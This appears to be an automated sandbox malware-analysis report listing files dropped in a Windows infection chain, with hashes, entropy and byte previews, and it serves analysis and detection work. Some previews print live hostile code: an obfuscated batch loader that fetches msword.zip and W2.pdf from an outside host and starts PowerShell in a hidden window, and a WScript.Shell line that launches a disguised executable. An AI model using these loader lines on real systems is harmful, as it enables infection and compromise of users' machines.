SHA-256:	6801E9D84DF9CAAB43718B737D58E5E3CD3CB614DBAFEB50776630FCD8E6694C
SHA-512:	531E901749A8C5687310E8330A8558384A94C28587AC8B6B3EE362449F2C46B9F27BBF3C162095A030D880E6693E477F62FAB7A2C24F7D89FED0AC0E09A8C494
Malicious:	true
Preview:	new ActiveXObject("W"+"script.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\LinkHub.com\" \"C:\\Users\\user\\AppData\\Local\\ConnectWare Technologies Ltd\\y\"")

C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\U

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	702975
Entropy (8bit):	7.9996899596807305
Encrypted:	true
SSDEEP:	12288:7oJEXO+WtgpSKS6G4epnMRNutIPcIyuSvcmeeVURApKFWRR51vR0pGlh7e7:wE++WKUsGqcIyuSkeVURAw2JvRmGlh7c
MD5:	40320097845035E71C88A2796F2F751B
SHA1:	C6002D6BEC7322277FE88154FDE0829C8A8E2762
SHA-256:	62BD76A99BCD9EAE526C4A6D147C02832138A6AA1D38559DB20174F74D806946
SHA-512:	57780D293AE512BBCF53F13AFF29851C9A94A4F7ED1D51654CEDD06A6089D80AAEDCCF68F7CC5D3B37659E77AD3058EC72AE8CCB18BBD7478C5FB06F93776074
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Approaches

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	Microsoft Cabinet archive data, 488285 bytes, 11 files, at 0x2c +A "Instantly" +A "Dressing", ID 8829, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488285
Entropy (8bit):	7.998550946105718
Encrypted:	true
SSDEEP:	12288:GtaS7z1F+D7f32HLxjQ8IeOFg8CAINNtUcfgBTG12Zqc:+aS7zqDcLxk8Ie5ZNN6cQqwZqc
MD5:	7A07DED0E02828AA5F3CFBAD5642C558
SHA1:	166EAD6F90D79790E559C7CB19BC2588E6EDBAE1
SHA-256:	2089D963BDAD621F966AC18E371FBF4BDD2E94CFA1841142EDF317E4B971F28B
SHA-512:	9DA78695AC581646ADBA790FBBFEE3E2E26DA4F60C75FCABCF11D30E06054D59C6E3A764B4828EEBC6592E7FE5255BF1778AE1A8877D60E1A45C971B9D2586D6
Malicious:	false
Preview:	MSCF....]s......,...............}"..<........`........'Z.% .Instantly......`....'Z.% .Dressing......x....'Z.% .Measurement..$...\|....'Z.% .Indonesia..@.......'Z.% .Led...........'Z.% .Different...........'Z.% .Missed...........'Z.% .Clinton..\|........'Z.% .Brian..........'Z.% .Protocol..4..]@....'Z.% .Constitute...b..K..CK...\|...0>..,.Y1.......ltA.K$.l.H.....[..>.....'[..n...Zk...>..m..Uw...~..Jb..E..DX>.l d.s..n....y...~.s?.=..{.=..s........[.Fwm.g..\OR..q.l'..>.G...\|..r.s9..p...>..[.B.\....e.99"..ub...x......i(.r.........S2.)..3.8.xXl........o#..YE.(...%...7Z.N.....\|.F.f..l..H.b...KI..1..mm.3.B.V....x.V..{..f..p.Z....V[%.T.....r......^.S@w.#..r...lQ.&b?P..Y.]MN~(.b.Ja........-..1..T.m...\v...v...>.......0...a.K.X.X..ib.I..#q.....K....."...).4...d..F.,....62>.X.e.7....7..i..[.(....[.5..m..Y#"....."~.9xz..S.....j..i.][7NU...2k..__...\|uL.....M..Y..rP..7.....F..Q......B$.O...ZO.]n.U..n..z..;Jj..H...Q...G/K..+c.MEj.l..j....Jl..[l..\|.~.....f..>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Beam

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.997420919125293
Encrypted:	true
SSDEEP:	1536:mPM2IWHYOOcbdpzCNBSD2XTn32zuIcRgk64wnWEi8o:mP5THh5b3+n32zo64Ao
MD5:	18E13DD846278DD017E9BDD8322ACF0E
SHA1:	431DDC2AF8197F887CF7E9B5346792FDBF0F07E3
SHA-256:	4784DDD355896DE73BCCCDB7D0AFD69D6376ADE1F3A22B18BFDA58EB4DFB0744
SHA-512:	005CBE957E2FE900299A82168D0CEB4FF9A89FE82B407103A7DA34BED1C0F12CF22850080D2EB22FAD5A0BAC7813696103BAFCA6735FB31223BEFFF0697CCE2F
Malicious:	false
Preview:	.w..+..h}...X.M....N..h.y.......>...e......pD..{..S....u....8...!.9.....Q.G..rB...d.._..q.~...}8.../.CW.E.`.......c.}..x...M..H..,Mk...N..K......G.>..F.Ru....-....9.Y...q...3$.iN.!.\|.g...n...k..W.i..g..J.L.....P.....F'{6}.i.<,a}..i.....]"......y.yi.+..C..-^j....T.6..j.5..f..&..DN4.$B.i.&..#..K..d......."...."U...r...Qm..V....6....e.....X.vw...I..B<ei....}.>l._,......H.kq.5...........{.QT.Z'.dF[...fkMH$V%....K....y.M..b.G....lv.....>.q..n...-..D7;F~...Ix..AL.5.}......0..9X..w.I...o..\...a.<..a&<...t(.iz.?.N...mx.o...O.b.}5G.~.c.#.....==...O..RY......o..]...G?=.<.;...N.^.E.2.3....=...XC.6..XC.)H<......4.?>\...Ng...C.vHLv<..A..u.p-qs.G)z.8\|.s.<V.._..6.`.^..#.^..._o...4..^h....!"&I...>....b...'.=I(.'e..!..Z..R1;..3A..F/.Jwr.GcX*GO?.t...f^1G...cF..@.iC.U.8.#..$..p......e2....U..j.c....q..V.rL....xf...F..X85.5.L#K.T.s..a.c`......z_.Y..9E.6......>...x2...=.d..`...^.U.p~..n.U.#........S.BY..n/........]..M....1...J8..%.:..l..s.8...\....J...D.y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Blocked

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.9982174281872025
Encrypted:	true
SSDEEP:	3072:tYj0CGgXe/2IS6hnqS2WONlLUDBt7itJs6g:tYVG4ehSOnMWONlY9t7itJQ
MD5:	99A9AA7C4197C9FA2B465011F162397E
SHA1:	F4501935D473209F9D6312E03E71B65271D709E4
SHA-256:	6196D79DC188E3581F8446637CF77E8E9105000E7A8A8135213F750D9BC65EB0
SHA-512:	03EF41FC61EC810C788252EEDCDC7C2616A55C2CF0996F830DAB1A60982589360CAD7C71B76A199A94DE0337BD068AC1A7A6503CE67CC091BAF1C6C6758B01F5
Malicious:	false
Preview:	4t....d+.R..f[.V....3@.....L?/.'.D.."........I..6..q..AC..CK.W.xjt[.:.....m>..PWV.l......BQ.H.x.xw..,?..S..$.. .. y..........do....R.a..Hn...N.x..I.R.j.1.D..`..L.D.`x4.....`v.. .q...D.b......J.{.6\|..m.......k.!.7.4.Z%.............(...O/.'".A.H..{r(.Z.$.......-......ZXo.ts.r.......i..~Y.w.l..aS....lv.DI?g{'Z..J.Sq.s.......>OB..-.#k.t...M.Y@~x. .C0.h...C.6O...5.K2!0.Z..+.@F.T...{k.U...S....u.n]...M.7S.....[..;.D..o.....t...H.&.c.2.7...%...".&].2....@......Q...YZ.d.P...r\.;...e......b(.....Xc.8...h....k....O..p.i.@$..q..k8....3...:....&@)x.....j....c.k.x.$9,.0..".....v......Q.d..?cW..&mmw.g..U`.....R7..P..^..1.f.Mb......?...^....6.v..P...K...j.`f.I.?..lJ6.F...q..{.}..C......@.L.w....k.Au....@V.x..{l,.%)....>...i.y.b.....5.G[....n....i.G...a.....".A...h.!6+../....P.....L...>".Y.0....q.39.P..!bj...da.#e......-.U....h...mh.+..V.}....<./....F.dw...,.l......j5...B<..30.,...W.m#].F.O..FLP.d..:.....L..~F0e..j.zq..)p(h...R...}p.B

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Brian

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	5.234350627932401
Encrypted:	false
SSDEEP:	768:Jx/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:JdKaj6iTcPAsAhxjgarB
MD5:	031B6C0EDF7E1DD8ACF9700CC96085D7
SHA1:	0819EC14EBC323A9507E52A0579F6F9BA1589C3D
SHA-256:	7FA45FC5F2F9C52E289D56F5AF6B95427EDC979A838608DC20CB4D89C7078553
SHA-512:	75577FEEB70AF3025A021FB8DD3FC52B56AC9EC7CE7B0BB24E2970CA3626A0B96984ADB7874AE5608C9A739BC46E5C2207C98B2CB0C40925B2D95B7A2969A7BA
Malicious:	false
Preview:	?.?.?.?.?.?.?.?.?.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.@.r.r.r.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.A.A.A.A.A.A.A.A.A.A.r.r.r.r.r.r.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.B.r.r.r.r.r.r.r.r.r.r.r.C.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.D.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Clinton

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	4.910075425726921
Encrypted:	false
SSDEEP:	768:FOWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+3:F5el3EYrDWyu0uZo2+3
MD5:	2BC25537976C2E146EBED51446CE7B59
SHA1:	0EBD76401729D4F1B9B4DCAB1586D96CD410A1D2
SHA-256:	F01BA73C4332997F031434DDA3EBBFE03EE70F9BE65275ABEEDE452E148B94E7
SHA-512:	7BA4AEA3D8836216CDFB4B27EC7AF041BF9EDB5A0DEA8BEECE8C7950BC9BC793B12F7E7C1A0B4EA6E0194A1211CACBFB06204E68689E0DA3E895BE8518572A80
Malicious:	false
Preview:	................................................................................PST.............................................................PDT............................................................. .L.`.L.....................................`.y.!...............................@~............. ...............................@.............. ...............................A.................[.........................@~......Q...Q.^. ._.j.2.........................1~........................................................................................................ .............................................................................................................................................................................................................abcdefghijklmnopqrstuvwxyz......ABCDEFGHIJKLMNOPQRSTUVWXYZ.............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997164994069138
Encrypted:	true
SSDEEP:	1536:bdM1aIyizRac/AX9Cslc7g63p8ueagJNvZoNoWRY6Du/FI84:ZVIyQ/o91658ueaa2PS/FIj
MD5:	990ABD973C6DDB75837EEB5B21F59AE1
SHA1:	85846C0CE7CD3314DEC32E3BED99511A59B6500A
SHA-256:	29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
SHA-512:	179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
Malicious:	false
Preview:	.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...yw..1...V.~........h\pK3m ........(h..\|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[\|.."}...E...../.$.......d.\|..X.-^.d.F"..".W..(..<.........HQ............M!c......?Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Constitute

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	144384
Entropy (8bit):	6.494296209067955
Encrypted:	false
SSDEEP:	3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
MD5:	57BB8B206C43DDE57D7066A4DEDB272C
SHA1:	E3B400206A6D3C7C5885CB56BFCAB82220BB110A
SHA-256:	821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
SHA-512:	C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
Malicious:	false
Preview:	..F...................E....;E...MN..;...EN.........H......T...$.PA........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.xA....c.......Z...;...\|....N......u........P..................S.......A..$..A......V.......1....7........u...S...l....q...........h....$..A....N...V...]....M...H..........$..A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\David

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	56320
Entropy (8bit):	7.996610067500435
Encrypted:	true
SSDEEP:	1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
MD5:	583A66DF71B30CE556F3F5131162AA1C
SHA1:	0594EF5DF9510410B520282D9C833D604969865A
SHA-256:	83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
SHA-512:	3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
Malicious:	false
Preview:	J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T.&.c..G. .....q.B..Sf..........M....m.A\|..S.N.:....?0R....$:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...\|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a.\..R.-.w....b.1..g..yJL...)...AJ.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....\|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..\|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Different

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	6.548010857173451
Encrypted:	false
SSDEEP:	1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
MD5:	56BB83409EE3E1A9DDF64E5364CBAAF6
SHA1:	C3DA7B105A8C389BE6381804CB96BB0461476E39
SHA-256:	D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
SHA-512:	59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
Malicious:	false
Preview:	U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Dressing

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	137216
Entropy (8bit):	6.481339286025911
Encrypted:	false
SSDEEP:	3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
MD5:	1CB233987779B587705687B7D8F66A01
SHA1:	5F33D543C24701D370072BB4E77E4A8D058AE035
SHA-256:	48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
SHA-512:	56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
Malicious:	false
Preview:	.j.....I......u0..$.I....Q..\|....L..t..I8.A..\|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..\|....L..t..I8.A..\|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..\|:...L:.t..I8.A..\|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..\|1...D1.t..@8.H...\|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..\|1...T1.t..R8.B..\|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..\|....T..t..R8.B..\|....D..t..@8.@.....>_^3.[]...U

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\c2[1].bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	ASCII text, with very long lines (904), with CRLF line terminators
Category:	dropped
Size (bytes):	3634
Entropy (8bit):	5.236008723707643
Encrypted:	false
SSDEEP:	96:m+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:oCjaob3Z2SnE8tSqCB9Y
MD5:	87022BBA9DB0F800B26D9609ACBBCF49
SHA1:	D7BE8CC8D4CFFCCE0BD7D361037BBE575E49CC6A
SHA-256:	1F6CE0F5CD3793AAEA9B3F9DE99F04679B8DB2F1056532982D835E665006ECE7
SHA-512:	B7BE35A7A8EF40CF5326EFD77EB4A2EE05162B241267695C6927F12340BE3720AF299D37AFB5F02025EF8948E71C8A4F8CC21B5C805C9DD777797694C033D53F
Malicious:	true
Preview:	@%VLuxDxBM%e%zknhtrti%c%qXIe%h%DioUprb%o%nF% %XSzpJuJ%o%Z%f%dL%f%eEMB%..set url=https://myguyapp.com/msword.zip..s%OfRZh%e%bzhkruSY%t%DkutKd% %dxDH%u%KzG%r%KGuWgpBmMo%l%adqPhBwR%=%YNMjm%h%rtRLtPJeR%t%DSfWzS%t%yYy%p%ABTMWXuAs%s%m%:%MI%/%SnBl%/%ttm%m%gvt%y%rjdee%g%dwYNwJT%u%MoAZng%y%pXoEB%a%Yy%p%UKZM%p%ctS%.%Jnv%c%YYTHkw%o%wkC%m%GFePO%/%jldFiSl%m%IP%s%xK%w%hLcFpDndPO%o%DaOxa%r%ZM%d%AR%.%f%z%GzD%i%e%p%JevMulL%..set url2=https://myguyapp.com/W2.pdf..s%hwvwRF%e%QuDLrd%t%JICNv% %PxorhwP%u%aYH%r%hotHXeBZtg%l%oJKbuFDbgq%2%yHfekdVP%=%NdKRoGUgr%h%xKSx%t%rvRKBSleIX%t%SpSm%p%wbQdk%s%R%:%Dizx%/%HHLDZ%/%es%m%XjoF%y%J%g%olMBNbeo%u%DVZtkXm%y%MsH%a%LyuRF%p%Eryft%p%idiglSH%.%odKAWwiYof%c%CtLK%o%KjljBrysB%m%o%/%GQYaqs%W%LDmDZbmha%2%sFQKV%.%vIMk%p%VuXimjsr%d%acamBo%f%nrMe%..p%wsZX%o%zbulUZgp%w%inxp%e%aiWTgYV%r%KUWANAEWb%s%oDEk%h%gPNeE%e%ibNOiBI%l%LHUUm%l%ETUgg% %jDR%-%GUoW%W%j%i%OZUiVG%n%xC%d%EvHpV%o%BVeSOp%w%kLnyCABxV%S%Xb%t%IKytjHq%y%Pw%l%jYJgLlEn%e%cWXrPRDt% %xRzJFYoSU%H%BYa%i%aNxNnfpSO%d%mJLHttj%d%PEn

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019205124979377
Encrypted:	false
SSDEEP:	12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	B62617530A8532F9AECAA939B6AB93BB
SHA1:	E4DE9E9838052597EB2A5B363654C737BA1E6A66
SHA-256:	508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
SHA-512:	A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
Malicious:	false
